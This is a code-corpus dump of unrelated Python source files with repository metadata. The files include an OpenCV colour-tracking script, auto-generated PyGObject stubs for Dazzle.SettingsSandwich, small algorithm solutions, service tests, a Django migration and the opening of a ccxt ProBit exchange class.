return self.state_, reward, episode_end, {'probs':probs, 'random_num':random_num}
# Manual smoke test (Python 2): drive the grid world with a uniform-random
# policy and print the full transition trace of every episode.
if __name__=="__main__":
    rows = 5
    cols = 5
    R_max = 10.0
    noise = 0.3
    env = Gridworld(rows, cols, R_max, noise)
    print "env.n_state : ", env.n_state
    print "env.n_action : ", env.n_action
    max_episode = 1000
    max_step = 200
    # reward_map = np.load('./reward_map.npy')
    # print "reward_map : "
    # print reward_map
    # Sparse reward map: R_max only in the bottom-right (goal) cell.
    reward_map = np.zeros([rows, cols])
    reward_map[rows-1, cols-1] = R_max
    for i in xrange(max_episode):
        print "================================================="
        print "episode : ", i+1
        observation = env.reset()
        for j in xrange(max_step):
            print "---------------------------------------------"
            state = observation
            print "state : ", state
            # Uniform-random action selection over the action set.
            action = np.random.randint(env.n_action)
            print "action : ", action, env.dirs[action]
            # observation, reward, done, info = env.step(action)
            observation, reward, done, info = env.step(action, reward_map)
            next_state = observation
            print "next_state : ", next_state
            print "reward : ", reward
            print "episode_end : ", done
            # print "info : ", info
            print "step : ", j+1
            if done:
                break
| [
"[email protected]"
] | |
6c8ac1427f142513c13bd7794b07ab96a6f4c884 | 751cf52d62dba7d88387fc5734d6ee3954054fc2 | /opencv/experiments_raw/contourExperiments/contourExperiment.py | 25321959930231caf2a2607e82fe2c8687768cfe | [
"MIT"
] | permissive | nooralight/lab-computer-vision | 70a4d84a47a14dc8f5e9796ff6ccb59d4451ff27 | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | refs/heads/master | 2023-03-17T12:45:22.700237 | 2017-07-11T22:17:09 | 2017-07-11T22:17:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | """
Display three views:
original frame
mask
resultant frame
whenever user clicks in original frame, color is specified
this color becomes the new mask color
The system then creates a contour around the largest object of that color on the screen, and a crosshair follows after that object
"""
import cv2
import numpy as np
# Currently selected target colour (HSV); updated by the mouse callback
# whenever the user clicks a pixel in the 'frame' window.
color = np.array([0,0,0])
# CRAN = 20
# CRanArr = np.array([20, 10, 10])
# try (0, 50, 10)
def findHSV(bgr):
    """Convert one BGR colour triple to its HSV equivalent via OpenCV."""
    pixel = np.uint8([[bgr]])  # cvtColor needs a 1x1 "image", not a bare triple
    return cv2.cvtColor(pixel, cv2.COLOR_BGR2HSV)
def drawXHair(img, y, x):
    """Draw a red crosshair (circle plus centre lines) on *img* at (x, y)."""
    colour = (0, 0, 255)  # BGR red
    radius = 20
    thickness = 2
    cv2.circle(img, (int(x), int(y)), radius, colour, thickness)
    cv2.line(img, (x - radius, y), (x + radius, y), colour, thickness)
    cv2.line(img, (x, y - radius), (x, y + radius), colour, thickness)
def colorSelect(event, x, y, flags, param):
    """Mouse callback: on left-button release, sample the clicked pixel of the
    current ``frame`` and store its HSV value in the module-level ``color``."""
    global color
    if event != cv2.EVENT_LBUTTONUP:
        return
    clicked_bgr = frame[y, x, 0:3]
    color = findHSV(clicked_bgr)
    print(color)
def doNothing(x):
    """No-op trackbar callback (cv2.createTrackbar requires a callable)."""
    return None
cap = cv2.VideoCapture(0)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', colorSelect)
cv2.namedWindow('trackbars')
cv2.createTrackbar('H', 'trackbars', 0, 50, doNothing)
cv2.createTrackbar('S', 'trackbars', 50, 50, doNothing)
cv2.createTrackbar('V', 'trackbars', 10, 50, doNothing)
while(1):
dh = cv2.getTrackbarPos('H', 'trackbars')
ds = cv2.getTrackbarPos('S', 'trackbars')
dv = cv2.getTrackbarPos('V', 'trackbars')
CRanArr = np.array([dh, ds, dv])
# take each frame
_, frame = cap.read()
print(np.shape(frame))
# convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of blue color in HSV
# lower_color = color + np.array([-CRAN, -CRAN, -CRAN])
# upper_color = color + np.array([CRAN, CRAN, CRAN])
lower_color = color - CRanArr
upper_color = color + CRanArr
# print lower_color , '|' , upper_color
# threshold the HSV image to get only blue colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Noise removal experimentation
kernel = np.ones((20,20), np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# mask = cv2.erode(mask, kernel, iterations = 1)
# mask = cv2.dilate(mask, kernel, iterations=5)
ret, thresh = cv2.threshold(mask, 127, 255, 0)
im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(mask, contours, -1, 150, 3)
area = 0
largest_contour = 0
for i in xrange(len(contours)):
if cv2.contourArea(contours[i])>area:
largest_contour = i
cv2.drawContours(mask, contours, largest_contour, 150, 3)
print len(contours)
if len(contours)>0:
M = cv2.moments(contours[largest_contour])
if M['m00']>0:
cx = int(M['m10']/(M['m00']))
cy = int(M['m01']/(M['m00']))
print cx ,'|', cy
drawXHair(frame, cy, cx)
print(color)
# bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask= mask)
cv2.imshow('frame', frame)
cv2.imshow('mask', mask)
cv2.imshow('res', res)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
76c88c378f30434c23ff53230551d62966e81f4c | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Dazzle/SettingsSandwich.py | 4bf884a1566ec11046ea8ac3aff429377d644bff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 18,357 | py | # encoding: utf-8
# module gi.repository.Dazzle
# from /usr/lib64/girepository-1.0/Dazzle-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.Gio as __gi_overrides_Gio
import gi.overrides.GObject as __gi_overrides_GObject
import gi.overrides.Gtk as __gi_overrides_Gtk
import gi.repository.Gio as __gi_repository_Gio
import gi.repository.GObject as __gi_repository_GObject
import gi.repository.Gtk as __gi_repository_Gtk
import gobject as __gobject
class SettingsSandwich(__gi_overrides_GObject.Object):
"""
:Constructors:
::
SettingsSandwich(**properties)
new(schema_id:str, path:str) -> Dazzle.SettingsSandwich
"""
def append(self, settings): # real signature unknown; restored from __doc__
""" append(self, settings:Gio.Settings) """
pass
def bind(self, key, p_object=None, property, flags): # real signature unknown; restored from __doc__
""" bind(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags) """
pass
def bind_property(self, *args, **kwargs): # real signature unknown
pass
def bind_property_full(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def bind_with_mapping(self, key, p_object=None, property, flags, get_mapping, set_mapping, user_data=None): # real signature unknown; restored from __doc__
""" bind_with_mapping(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags, get_mapping:Gio.SettingsBindGetMapping, set_mapping:Gio.SettingsBindSetMapping, user_data=None) """
pass
def chain(self, *args, **kwargs): # real signature unknown
pass
def compat_control(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def connect(self, *args, **kwargs): # real signature unknown
pass
def connect_after(self, *args, **kwargs): # real signature unknown
pass
def connect_data(self, detailed_signal, handler, *data, **kwargs): # reliably restored by inspect
"""
Connect a callback to the given signal with optional user data.
:param str detailed_signal:
A detailed signal to connect to.
:param callable handler:
Callback handler to connect to the signal.
:param *data:
Variable data which is passed through to the signal handler.
:param GObject.ConnectFlags connect_flags:
Flags used for connection options.
:returns:
A signal id which can be used with disconnect.
"""
pass
def connect_object(self, *args, **kwargs): # real signature unknown
pass
def connect_object_after(self, *args, **kwargs): # real signature unknown
pass
def disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def disconnect_by_func(self, *args, **kwargs): # real signature unknown
pass
def emit(self, *args, **kwargs): # real signature unknown
pass
def emit_stop_by_name(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def find_property(self, property_name): # real signature unknown; restored from __doc__
""" find_property(self, property_name:str) -> GObject.ParamSpec """
pass
def force_floating(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def freeze_notify(self): # reliably restored by inspect
"""
Freezes the object's property-changed notification queue.
:returns:
A context manager which optionally can be used to
automatically thaw notifications.
This will freeze the object so that "notify" signals are blocked until
the thaw_notify() method is called.
.. code-block:: python
with obj.freeze_notify():
pass
"""
pass
def getv(self, names, values): # real signature unknown; restored from __doc__
""" getv(self, names:list, values:list) """
pass
def get_boolean(self, key): # real signature unknown; restored from __doc__
""" get_boolean(self, key:str) -> bool """
return False
def get_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_default_value(self, key): # real signature unknown; restored from __doc__
""" get_default_value(self, key:str) -> GLib.Variant """
pass
def get_double(self, key): # real signature unknown; restored from __doc__
""" get_double(self, key:str) -> float """
return 0.0
def get_int(self, key): # real signature unknown; restored from __doc__
""" get_int(self, key:str) -> int """
return 0
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_property(self, *args, **kwargs): # real signature unknown
pass
def get_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_string(self, key): # real signature unknown; restored from __doc__
""" get_string(self, key:str) -> str """
return ""
def get_uint(self, key): # real signature unknown; restored from __doc__
""" get_uint(self, key:str) -> int """
return 0
def get_user_value(self, key): # real signature unknown; restored from __doc__
""" get_user_value(self, key:str) -> GLib.Variant """
pass
def get_value(self, key): # real signature unknown; restored from __doc__
""" get_value(self, key:str) -> GLib.Variant """
pass
def handler_block(obj, handler_id): # reliably restored by inspect
"""
Blocks the signal handler from being invoked until
handler_unblock() is called.
:param GObject.Object obj:
Object instance to block handlers for.
:param int handler_id:
Id of signal to block.
:returns:
A context manager which optionally can be used to
automatically unblock the handler:
.. code-block:: python
with GObject.signal_handler_block(obj, id):
pass
"""
pass
def handler_block_by_func(self, *args, **kwargs): # real signature unknown
pass
def handler_disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def handler_is_connected(*args, **kwargs): # reliably restored by inspect
""" signal_handler_is_connected(instance:GObject.Object, handler_id:int) -> bool """
pass
def handler_unblock(*args, **kwargs): # reliably restored by inspect
""" signal_handler_unblock(instance:GObject.Object, handler_id:int) """
pass
def handler_unblock_by_func(self, *args, **kwargs): # real signature unknown
pass
def install_properties(self, pspecs): # real signature unknown; restored from __doc__
""" install_properties(self, pspecs:list) """
pass
def install_property(self, property_id, pspec): # real signature unknown; restored from __doc__
""" install_property(self, property_id:int, pspec:GObject.ParamSpec) """
pass
def interface_find_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_install_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_list_properties(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def is_floating(self): # real signature unknown; restored from __doc__
""" is_floating(self) -> bool """
return False
def list_properties(self): # real signature unknown; restored from __doc__
""" list_properties(self) -> list, n_properties:int """
return []
def new(self, schema_id, path): # real signature unknown; restored from __doc__
""" new(schema_id:str, path:str) -> Dazzle.SettingsSandwich """
pass
def newv(self, object_type, parameters): # real signature unknown; restored from __doc__
""" newv(object_type:GType, parameters:list) -> GObject.Object """
pass
def notify(self, property_name): # real signature unknown; restored from __doc__
""" notify(self, property_name:str) """
pass
def notify_by_pspec(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def override_property(self, property_id, name): # real signature unknown; restored from __doc__
""" override_property(self, property_id:int, name:str) """
pass
def ref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def ref_sink(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def run_dispose(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_boolean(self, key, val): # real signature unknown; restored from __doc__
""" set_boolean(self, key:str, val:bool) """
pass
def set_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_double(self, key, val): # real signature unknown; restored from __doc__
""" set_double(self, key:str, val:float) """
pass
def set_int(self, key, val): # real signature unknown; restored from __doc__
""" set_int(self, key:str, val:int) """
pass
def set_properties(self, *args, **kwargs): # real signature unknown
pass
def set_property(self, *args, **kwargs): # real signature unknown
pass
def set_string(self, key, val): # real signature unknown; restored from __doc__
""" set_string(self, key:str, val:str) """
pass
def set_uint(self, key, val): # real signature unknown; restored from __doc__
""" set_uint(self, key:str, val:int) """
pass
def set_value(self, key, value): # real signature unknown; restored from __doc__
""" set_value(self, key:str, value:GLib.Variant) """
pass
def steal_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def steal_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def stop_emission(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def stop_emission_by_name(*args, **kwargs): # reliably restored by inspect
""" signal_stop_emission_by_name(instance:GObject.Object, detailed_signal:str) """
pass
def thaw_notify(self): # real signature unknown; restored from __doc__
""" thaw_notify(self) """
pass
def unbind(self, property): # real signature unknown; restored from __doc__
""" unbind(self, property:str) """
pass
def unref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def watch_closure(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def weak_ref(self, *args, **kwargs): # real signature unknown
pass
def _force_floating(self, *args, **kwargs): # real signature unknown
""" force_floating(self) """
pass
def _ref(self, *args, **kwargs): # real signature unknown
""" ref(self) -> GObject.Object """
pass
def _ref_sink(self, *args, **kwargs): # real signature unknown
""" ref_sink(self) -> GObject.Object """
pass
def _unref(self, *args, **kwargs): # real signature unknown
""" unref(self) """
pass
def _unsupported_data_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def _unsupported_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __deepcopy__(self, *args, **kwargs): # real signature unknown
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, **properties): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
g_type_instance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
qdata = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
ref_count = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__gpointer__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__grefcount__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
props = None # (!) real value is '<gi._gi.GProps object at 0x7f3b25efe460>'
__class__ = None # (!) real value is "<class 'gi.types.GObjectMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': ObjectInfo(SettingsSandwich), '__module__': 'gi.repository.Dazzle', '__gtype__': <GType DzlSettingsSandwich (93962411670528)>, '__doc__': None, '__gsignals__': {}, 'new': gi.FunctionInfo(new), 'append': gi.FunctionInfo(append), 'bind': gi.FunctionInfo(bind), 'bind_with_mapping': gi.FunctionInfo(bind_with_mapping), 'get_boolean': gi.FunctionInfo(get_boolean), 'get_default_value': gi.FunctionInfo(get_default_value), 'get_double': gi.FunctionInfo(get_double), 'get_int': gi.FunctionInfo(get_int), 'get_string': gi.FunctionInfo(get_string), 'get_uint': gi.FunctionInfo(get_uint), 'get_user_value': gi.FunctionInfo(get_user_value), 'get_value': gi.FunctionInfo(get_value), 'set_boolean': gi.FunctionInfo(set_boolean), 'set_double': gi.FunctionInfo(set_double), 'set_int': gi.FunctionInfo(set_int), 'set_string': gi.FunctionInfo(set_string), 'set_uint': gi.FunctionInfo(set_uint), 'set_value': gi.FunctionInfo(set_value), 'unbind': gi.FunctionInfo(unbind)})"
__gdoc__ = 'Object DzlSettingsSandwich\n\nProperties from DzlSettingsSandwich:\n path -> gchararray: Settings Path\n Settings Path\n schema-id -> gchararray: Schema Id\n Schema Id\n\nSignals from GObject:\n notify (GParam)\n\n'
__gsignals__ = {}
__gtype__ = None # (!) real value is '<GType DzlSettingsSandwich (93962411670528)>'
__info__ = ObjectInfo(SettingsSandwich)
| [
"[email protected]"
] | |
8dc31ef220e3a12803bb906e33892e6ea9a93a18 | b00873d36e44128ce30623da0ee3b556e4e3d7e7 | /solutions/solution725.py | 534be36c9402b8115b72bfe0c67a417dff55304b | [
"MIT"
] | permissive | Satily/leetcode_python_solution | b4aadfd1998877b5086b5423c670750bb422b2c8 | 3f05fff7758d650469862bc28df9e4aa7b1d3203 | refs/heads/master | 2021-07-18T07:53:10.387182 | 2021-07-17T06:30:09 | 2021-07-17T06:30:09 | 155,074,789 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from data_structure import ListNode, build_link_list, flatten_link_list
class Solution:
def splitListToParts(self, root, k):
"""
:type root: ListNode
:type k: int
:rtype: List[ListNode]
"""
def split(h, lh):
if h is not None:
p = h
for _ in range(lh - 1):
p = p.next
q = p.next
p.next = None
return q, h
else:
return None, None
lr, p = 0, root
while p is not None:
p, lr = p.next, lr + 1
n, r = lr // k, lr % k
result = []
for i in range(k):
l = n
if i < r:
l += 1
root, head = split(root, l)
result.append(head)
return result
# Quick manual check: build linked lists from the fixture tuples, split them,
# and print the flattened parts.
if __name__ == "__main__":
    inputs = [
        # ([1, 2, 3], 5),
        ([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3),
    ]
    for root_list, k in inputs:
        root = build_link_list(root_list)
        result = [flatten_link_list(head) for head in Solution().splitListToParts(root, k)]
        print(result)
| [
"[email protected]"
] | |
c3784b117e770c6c6948e80849e5bd8cf0457254 | 7727187a009e4b9c46c2fe06609372ec8814cd23 | /test/test_augment_data.py | d83bec586121132d679dc61a95c78929cece6eea | [] | no_license | govtmirror/freemix-akara | ebf204554f4effc0543e60083698f2ea012413b8 | 1d10c3f02afbd4268852e2c52afdf77809176bdd | refs/heads/master | 2021-01-12T07:47:08.183429 | 2014-06-05T18:53:56 | 2014-06-05T18:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | import os
import urllib, urllib2
from urllib2 import urlopen
from freemix_akara import __version__
from server_support import server
RESOURCE_DIR = os.path.join(os.path.dirname(__file__), "resource")
def _post_fixture(service, *fixture_path):
    """POST the given fixture file to an Akara service endpoint and return
    the decoded JSON response.

    Shared helper for the service smoke tests below: deduplicates the
    previously copy-pasted request logic and closes the fixture file
    (the old code leaked the open file handle).
    """
    import simplejson
    url = server() + service
    req = urllib2.Request(url)
    with open(os.path.join(RESOURCE_DIR, *fixture_path)) as fixture:
        data = fixture.read()
    response = urllib2.urlopen(req, data)
    return simplejson.load(response)

def test_augment():
    """The augment service should answer with an object carrying "items"."""
    results = _post_fixture("augment.freemix.json", "augment", "augment_test1.js")
    assert "items" in results

def test_mix():
    """The mix service should answer with an object carrying "items"."""
    results = _post_fixture("mix.freemix.json", "mix", "mix.js")
    assert "items" in results
| [
"[email protected]"
] | |
f1f4be0600c0a96312d2b00339681c2c5efff41b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_cackles.py | b56545b1c6dceb5e279e87bc0ba44c4f57263de2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
# class header
class _CACKLES():
def __init__(self,):
self.name = "CACKLES"
self.definitions = cackle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['cackle']
| [
"[email protected]"
] | |
0f7ddbc55809f101e6c51e745fc682ec6439b74a | edbf8601ae771031ad8ab27b19c2bf450ca7df76 | /283-Move-Zeroes/MoveZeroes.py | b7e24b42230eae378975aceeeb96569feb6628fa | [] | no_license | gxwangdi/Leetcode | ec619fba272a29ebf8b8c7f0038aefd747ccf44a | 29c4c703d18c6ff2e16b9f912210399be427c1e8 | refs/heads/master | 2022-07-02T22:08:32.556252 | 2022-06-21T16:58:28 | 2022-06-21T16:58:28 | 54,813,467 | 3 | 2 | null | 2022-06-21T16:58:29 | 2016-03-27T05:02:36 | Java | UTF-8 | Python | false | false | 548 | py | class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
if not nums or len(nums)<2:
return
slow=0
fast=0
size=len(nums)
while fast < size:
if nums[fast]==0:
fast+=1
continue
nums[slow] = nums[fast]
slow+=1
fast+=1
while slow < size:
nums[slow] =0
slow+=1
| [
"[email protected]"
] | |
f8ba0392696152c9b0153c42e7340ebb511a2e0a | 32bfc07c9661b0820e525158ef9a03c1d3256ecd | /Week 2/mysite-link1/django-polls/polls/migrations/0001_initial.py | 8f55db1363fc94de11712f49c0f9b7f97cca9bdc | [] | no_license | Aktoty00/BFDjango | c4d42d0f8d11a14813dbf2d67830531193b81417 | 95e28e9c56b1c1a3a286a1919b942512efdd585a | refs/heads/master | 2021-09-25T15:35:16.722971 | 2020-04-19T11:43:27 | 2020-04-19T11:43:27 | 234,919,812 | 0 | 0 | null | 2021-09-22T18:39:00 | 2020-01-19T15:16:34 | Python | UTF-8 | Python | false | false | 1,178 | py | # Generated by Django 2.1.7 on 2020-01-22 15:19
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django-polls.polls.Question'),
),
]
| [
"[email protected]"
] | |
a789ad6f90b611c1ab8c53baa204e144607c2690 | e7dfccc8136776443461b6580752c7f0f50556b3 | /matrix_webhook/__main__.py | 18d4fccae9584210927760e0ca5fa6e165449fa1 | [
"BSD-2-Clause"
] | permissive | nim65s/matrix-webhook | f223e404922860dfae711b3017664b976fd9d4e2 | ad74f632c630a748577ba201c5e89dfa02eece4d | refs/heads/master | 2023-09-01T01:02:28.097429 | 2023-08-01T11:09:14 | 2023-08-01T11:09:14 | 171,114,171 | 97 | 32 | NOASSERTION | 2023-09-06T13:53:04 | 2019-02-17T11:29:31 | Python | UTF-8 | Python | false | false | 334 | py | """Matrix Webhook module entrypoint."""
import logging
from . import app, conf
def main():
"""Start everything."""
log_format = "%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(message)s"
logging.basicConfig(level=50 - 10 * conf.VERBOSE, format=log_format)
app.run()
# Allow running the package directly: ``python -m matrix_webhook``.
if __name__ == "__main__":
    main()
| [
"[email protected]"
] | |
15c83f62c9fd56c469799186fc20478de46552d4 | 054eefaa17157b32869ea986347b3e539d2bf06b | /big_o_coding/Blue_13/Homework/day_12_eko_spoj.py | 23dcd5c8db290cfe538fb92b5da5ca59e51c778e | [] | no_license | baocogn/self-learning | f2cb2f45f05575b6d195fc3c407daf4edcfe7d0e | f50a3946966354c793cac6b28d09cb5dba2ec57a | refs/heads/master | 2021-07-12T23:32:14.728163 | 2019-02-10T14:24:46 | 2019-02-10T14:24:46 | 143,170,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import sys
input = sys.stdin.readline
N, M = map(int, input().split())
heights = list(map(int, input().split()))
def getCutted(height):
return sum(max(0, h - height) for h in heights)
left = 0
right = max(heights)
res = 0
while (left <= right):
mid = left + (right - left) // 2
if getCutted(mid) >= M:
res = mid
left = mid + 1
else:
right = mid - 1
print(res) | [
"[email protected]"
] | |
064bb76c7c62f304ae205b982893d13f9243fac9 | 1c4110a0bdbb888fd7a82579810cda2c73b52dba | /20210715 Pycharm/Pycharm/venv/Lib/site-packages/bamboo/common/colours.py | 389df001c9cd8b21e7310bebdda8bb08960fbeee | [] | no_license | DrillND/python | d09786e2937a10c9c67170826131b8ee204e0b37 | f6aa1d4d29e4519f89a63af4c3c8f83ed60630ea | refs/heads/main | 2023-06-19T11:51:14.307597 | 2021-07-16T07:18:52 | 2021-07-16T07:18:52 | 355,095,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py |
class bcolours:
    """ANSI escape sequences for coloured terminal output.

    Wrap text between a colour code and ``ENDC`` to reset, e.g.
    ``bcolours.WARNING + 'careful' + bcolours.ENDC``.
    """
    HEADER = '\033[95m'     # bright magenta
    OKBLUE = '\033[94m'     # bright blue
    OKGREEN = '\033[92m'    # bright green
    WARNING = '\033[93m'    # bright yellow
    FAIL = '\033[91m'       # bright red
    ENDC = '\033[0m'        # reset all attributes
    BOLD = '\033[1m'        # bold text
    UNDERLINE = '\033[4m'   # underlined text
| [
"[email protected]"
] | |
caae4574f3a9d4ee99d07f1fe8a8fa13f4a68803 | dea56c4d044a55ccbbc63224e99cdf5c0a37fd8a | /python/ccxt/probit.py | 3fa95319921ee39c8030da45e246abf27193cb2a | [
"MIT"
] | permissive | Biboxcom/ccxt | ece93a53e6dc3b402f068a5aa39bbf9a47b88e47 | a82a15718aa2fe430dbc09fe10cc99575e5d2b35 | refs/heads/master | 2023-04-12T12:56:25.782008 | 2020-12-24T00:08:07 | 2020-12-24T00:08:07 | 324,118,781 | 2 | 0 | MIT | 2023-03-21T09:05:59 | 2020-12-24T09:31:56 | null | UTF-8 | Python | false | false | 48,425 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import BadResponse
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TRUNCATE
from ccxt.base.decimal_to_precision import TICK_SIZE
class probit(Exchange):
def describe(self):
return self.deep_extend(super(probit, self).describe(), {
'id': 'probit',
'name': 'ProBit',
'countries': ['SC', 'KR'], # Seychelles, South Korea
'rateLimit': 250, # ms
'has': {
'CORS': True,
'fetchTime': True,
'fetchMarkets': True,
'fetchCurrencies': True,
'fetchTickers': True,
'fetchTicker': True,
'fetchOHLCV': True,
'fetchOrderBook': True,
'fetchTrades': True,
'fetchBalance': True,
'createOrder': True,
'createMarketOrder': True,
'cancelOrder': True,
'fetchOrder': True,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchMyTrades': True,
'fetchDepositAddress': True,
'withdraw': True,
'signIn': True,
},
'timeframes': {
'1m': '1m',
'3m': '3m',
'5m': '5m',
'10m': '10m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'6h': '6h',
'12h': '12h',
'1d': '1D',
'1w': '1W',
'1M': '1M',
},
